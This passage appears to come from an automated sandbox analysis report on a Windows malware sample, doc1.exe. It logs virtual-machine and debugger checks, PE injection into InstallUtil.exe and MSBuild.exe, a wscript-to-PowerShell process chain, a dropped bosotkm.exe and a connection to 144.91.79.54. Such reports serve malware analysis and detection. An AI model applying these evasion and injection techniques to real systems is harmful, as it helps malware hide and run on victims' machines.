                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599312
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599201
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599093
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598973
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598852
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598750
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598640
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598531
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598422
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598312
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598203
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598094
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597969
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597859
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597750
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597641
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597524
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597420
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597297
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597133
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597031
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596922
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596812
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596703
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596593
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596484
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596375
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596266
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596141
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596031
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595922
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595812
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595703
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595594
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595484
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595375
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595265
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595156
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595046
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594933
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594828
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594716
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594426
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594281
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594139
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599890
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599781
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599671
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599562
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599453
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599343
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599233
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599124
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599015
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598906
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598796
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598687
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598577
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598468
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598358
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598248
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598140
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598030
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597921
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597718
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597605
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597499
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597390
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597281
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597160
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597031
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596921
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596812
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596703
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596593
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596484
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596374
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596265
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596155
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596046
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595936
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595827
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595718
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595609
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595496
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595375
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595265
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595146
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594960
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594843
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594734
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594624
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594515
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594406
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594281
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                  Source: doc1.exe, 00000001.00000002.2303581232.0000000005612000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: wscript.exe, 00000003.00000003.2323886447.0000000000C1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2326637032.0000000000C1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2328065250.0000000000C1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.2329661615.0000000000C1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2311543486.0000000000C1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2303245791.0000000000C1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW2
                  Source: bosotkm.exe, 00000012.00000002.2593909614.00000000032E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                  Source: wscript.exe, 00000003.00000003.2323886447.0000000000C1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2326637032.0000000000C1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2328065250.0000000000C1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.2329661615.0000000000C1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2327596611.0000000000B9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324169500.0000000000B9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2311543486.0000000000C1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2303245791.0000000000C1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2303011239.0000000000B9C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2328293123.0000000000B9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2325315975.0000000000B9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: InstallUtil.exe, 0000001A.00000002.3446787487.0000000001147000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlles C/
                  Source: bosotkm.exe, 00000012.00000002.2593909614.00000000032E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                  Source: wscript.exe, 00000005.00000003.2384565726.00000198522E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                  Source: InstallUtil.exe, 00000015.00000002.3450204608.0000000000EAC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~
                  Source: InstallUtil.exe, 00000004.00000002.3445132383.0000000000ABE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\doc1.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess queried: DebugPort
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess queried: DebugPort
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess queried: DebugPort
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess queried: DebugPort
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess queried: DebugPort
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess queried: DebugPort
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess queried: DebugPort
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess queried: DebugPort
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess queried: DebugPort
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess queried: DebugPort
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_05777588 LdrInitializeThunk,21_2_05777588
                  Source: C:\Users\user\Desktop\doc1.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 144.91.79.54 80Jump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\doc1.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 9D0000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1210000 value starts with: 4D5A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 700000 value starts with: 4D5A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 9D0000 value starts with: 4D5A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: F80000 value starts with: 4D5A
                  Writes to foreign memory regions
                  Source: C:\Users\user\Desktop\doc1.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 422000Jump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 424000Jump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 702008Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 9D0000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 9D2000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 9E4000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 9E6000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: A85008Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 422000
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 424000
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: B49008
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 422000
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 424000
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: D93008
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1210000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1212000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1224000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1226000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1054008
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 700000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 702000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 714000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 716000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 47A008
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 9D0000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 9D2000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 9E4000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 9E6000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BAD008
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: F80000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: F82000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: F94000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: F96000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D53008
                  Source: C:\Users\user\Desktop\doc1.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msb.vbe" Jump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 400 -s 1064Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "3508" "2808" "2740" "2812" "0" "0" "2816" "0" "0" "0" "0" "0" Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "2188" "2800" "2756" "2804" "0" "0" "2808" "0" "0" "0" "0" "0"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "6756" "2872" "2688" "2876" "0" "0" "2880" "0" "0" "0" "0" "0"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "2548" "2816" "1512" "2820" "0" "0" "2824" "0" "0" "0" "0" "0"
